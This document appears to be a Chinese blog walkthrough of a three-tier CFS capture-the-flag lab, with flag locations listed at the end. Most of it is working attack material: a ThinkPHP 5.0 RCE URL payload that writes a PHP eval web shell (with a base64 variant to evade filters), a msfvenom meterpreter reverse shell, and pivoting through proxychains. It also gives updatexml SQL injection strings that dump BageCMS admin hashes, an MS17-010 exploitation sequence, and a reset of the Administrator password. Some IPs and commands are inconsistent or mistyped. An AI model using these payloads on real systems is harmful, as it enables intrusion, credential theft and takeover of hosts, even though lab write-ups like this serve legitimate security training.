渗透测试——CFS三层靶机渗透

渗透测试——CFS三层靶机渗透_第1张图片
是样一个逻辑
nmap信息收集:

nmap -T4 -O 192.168.1.107

渗透测试——CFS三层靶机渗透_第2张图片

http://192.168.1.107/public/

渗透测试——CFS三层靶机渗透_第3张图片看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞
payload:

http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

渗透测试——CFS三层靶机渗透_第4张图片
执行成功说明存在此漏洞
写入shell

http://192.168.1.107/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%E2%80%9C%3C?php%20@eval($_POST[%E2%80%98TeamsSix%E2%80%99]);?%3E%E2%80%9D%20%3E%20shell.php
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '$_POST['123456'])?>' > shell.php

在这里插入图片描述
看看是否写入:

http://192.168.1.107/public/shell.php

渗透测试——CFS三层靶机渗透_第5张图片
上菜刀连接:
渗透测试——CFS三层靶机渗透_第6张图片
如果有拦截改成base64

[scode type="yellow"]如果连接失败可能是存在过滤,可用base64进行编码
然后语句改为:echo "PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk/Pg==" | base64 -d > test1.php 即可

看下靶机一系统信息

uanme -a

渗透测试——CFS三层靶机渗透_第7张图片

渗透测试——CFS三层靶机渗透_第8张图片
然后使用msfvenom生成对应的反向shellcode:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=8848 -f elf > msf_shell.elf

把这个木马用菜刀上传上去:
渗透测试——CFS三层靶机渗透_第9张图片
使用命令运行它:

ls

渗透测试——CFS三层靶机渗透_第10张图片
运行不了看报错是权限问题

./

修改权限:

chmod 777 msf_shell.elf

运行

./msf_shell.elf

渗透测试——CFS三层靶机渗透_第11张图片
现在我们用msf监听:

msfconsole

刚才我把生成木马的ip写错了应该是192.168.1.108
控制命令如下:

渗透测试——CFS三层靶机渗透_第12张图片

自己的kali ip和监听端口
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.08
LHOST => 192.168.1.108
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

接着利用拿下的这个服务器打入内网:
1.获取内网网段地址:

run get_local_subnets

渗透测试——CFS三层靶机渗透_第13张图片
192.168.1.0/24是我们可访问的,我们需要添加一条道192.168.22.0/24的路由:

run autoroute -s 192.168.22.0/24

渗透测试——CFS三层靶机渗透_第14张图片
查看路由:

run autoroute -p

渗透测试——CFS三层靶机渗透_第15张图片
查看地址解析记录arp -a确定第二层目标为192.168.22.128

arp -a

渗透测试——CFS三层靶机渗透_第16张图片

使用background返回msf

搜索socks代理模块

search socks

渗透测试——CFS三层靶机渗透_第17张图片

use auxiliary/server/socks4a
show options

在这里插入图片描述

渗透测试——CFS三层靶机渗透_第18张图片
在这里插入图片描述

[scode type=“blue”]SRVHOST:监听的ip地址,默认为0.0.0.0,一般不需要更改。
SRVPORT:监听的端口,默认为1080,可自行修改
[/scode]
配置proxychains代理链

cat /etc/proxychains.conf

修改文件内容如下:
其实现在新版本默认就这样
渗透测试——CFS三层靶机渗透_第19张图片
0x02 靶机2
获取shell
端口扫描
此处扫描不能使用nmap默认的扫描方式,不能使用-A-T4参数
命令

proxychains nmap -Pn -sT 192.168.22.128

-Pn跳过主机发现阶段,把每个都IP当成存活主机。
-sn只进行主机发现,不进行端口扫描。
渗透测试——CFS三层靶机渗透_第20张图片
在这里先不急配置下环境2
其过程和1类似不懂的看上篇博客
渗透测试——CFS三层靶机渗透_第21张图片
渗透测试——CFS三层靶机渗透_第22张图片
这里我登录不上换个方式ssh

proxychains ssh [email protected]渗透测试——CFS三层靶机渗透_第23张图片

渗透测试——CFS三层靶机渗透_第24张图片
进去后我们修改
渗透测试——CFS三层靶机渗透_第25张图片
渗透测试——CFS三层靶机渗透_第26张图片
访问

http://192.168.22.128/robots.txt
 proxychains dirb http://192.168.22.128 

扫下目录
渗透测试——CFS三层靶机渗透_第27张图片

访问:

http://192.168.22.128/index.php?r=admini

跳转到:

http://192.168.22.128/index.php?r=admini/public/login

渗透测试——CFS三层靶机渗透_第28张图片
弱口令进不去,看下源代码
渗透测试——CFS三层靶机渗透_第29张图片
发现了版本号有sql注入
手工注入
先确定数据库

http://192.168.22.128/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,%20database(),0x7e),1)--+

渗透测试——CFS三层靶机渗透_第30张图片
现在读表名

http://192.168.22.22/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

渗透测试——CFS三层靶机渗透_第31张图片
ok
也可使用limit逐条读取:

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='bagecms' limit 0,1),0x7e),1)--+

渗透测试——CFS三层靶机渗透_第32张图片
按照道理来讲这个更可以但是可能过滤了某些东西
现在读取字段

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='bagecms' and table_name='bage_admin'),1,32),0x7e),1)--+

渗透测试——CFS三层靶机渗透_第33张图片
确定字段值:

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select concat(username,0x7e,password) from bagecms.bage_admin),1,31),0x7e),1)--+

渗透测试——CFS三层靶机渗透_第34张图片
MD5去解码 也就是撞库
https://www.cmd5.com/

123qwe

我在这没解开自己去拿个自己去撞
现在登陆吧

http://192.168.22.128/index.php?r=admini/default/index

渗透测试——CFS三层靶机渗透_第35张图片
渗透测试——CFS三层靶机渗透_第36张图片
试试

phpinfo()

渗透测试——CFS三层靶机渗透_第37张图片

渗透测试——CFS三层靶机渗透_第38张图片

http://192.168.22.128/index.php?r=tag

渗透测试——CFS三层靶机渗透_第39张图片
可以看到被执行了
好了我们写入一句话木马吧

<?php @eval($_POST['123456'])?>

渗透测试——CFS三层靶机渗透_第40张图片
现在用个代理工具
渗透测试——CFS三层靶机渗透_第41张图片
渗透测试——CFS三层靶机渗透_第42张图片
渗透测试——CFS三层靶机渗透_第43张图片
渗透测试——CFS三层靶机渗透_第44张图片
渗透测试——CFS三层靶机渗透_第45张图片
到了这里因为是三层代理所以网络很不稳定
按照道理来讲
arp -a是可以看到三层目标的就和二层的方法一样亲测多次偶尔一两次成功所以很难成功
端口扫描

proxychains nmap -Pn -sT 192.168.33.33

渗透测试——CFS三层靶机渗透_第46张图片
目标开放了3389、445确认目标为windows,445可尝试看下是否存在EternalBlue(永恒之蓝)漏洞。
进入msf搜索ms17-010相关模块:
渗透测试——CFS三层靶机渗透_第47张图片
先使用辅助探测模块auxiliary/scanner/smb/smb_ms17_010查看下该机器是否存在该漏洞

msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.33.33
RHOSTS => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

结果表明该靶机很可能存在该漏洞。
在这里插入图片描述
下面开始利用:
利用模块存在两个:

exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec

[scode type=“green”]ms17_010_psexec是相对新一点的模块
一般首先使用ms17_010_psexec进行利用,若利用失败出现LoginError那么表示该机器可能需要指定SMBUser和SMBPass这时可尝试使用原始模块:ms17_010_eternalblue,但是某些版本还是可能会出现现要求指定SMBUser及SMBPass
[/scode]

msf5 exploit(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

渗透测试——CFS三层靶机渗透_第48张图片
利用成功:
渗透测试——CFS三层靶机渗透_第49张图片

meterpreter > shell
C:\Windows\system32>whoami
C:\Windows\system32>net user
C:\Windows\system32>net user Administrator 123456

渗透测试——CFS三层靶机渗透_第50张图片
SocksCap附加进程:mstsc.exe启动远程桌面进行远程登录:
渗透测试——CFS三层靶机渗透_第51张图片
0x04 FLAG位置
靶机1
1、 根目录下
渗透测试——CFS三层靶机渗透_第52张图片
https://assets-1252108786.cos.ap-chengdu.myqcloud.com/usr/uploads/2020/01/1579334733.png
3、robots.txt文件中
渗透测试——CFS三层靶机渗透_第53张图片
靶机2
1、Web管理后台
渗透测试——CFS三层靶机渗透_第54张图片
2、网站目录下
渗透测试——CFS三层靶机渗透_第55张图片
渗透测试——CFS三层靶机渗透_第56张图片
4、passwd文件中
渗透测试——CFS三层靶机渗透_第57张图片
5、crontab文件中
渗透测试——CFS三层靶机渗透_第58张图片
6、错误日志文件中
在这里插入图片描述
靶机3
1、桌面
渗透测试——CFS三层靶机渗透_第59张图片
2、C:\Windows\System32\config\目录下
渗透测试——CFS三层靶机渗透_第60张图片
3、任务计划里
渗透测试——CFS三层靶机渗透_第61张图片
4、注册编辑器里
渗透测试——CFS三层靶机渗透_第62张图片

你可能感兴趣的:(渗透测试,漏洞复现,渗透测试,安全漏洞)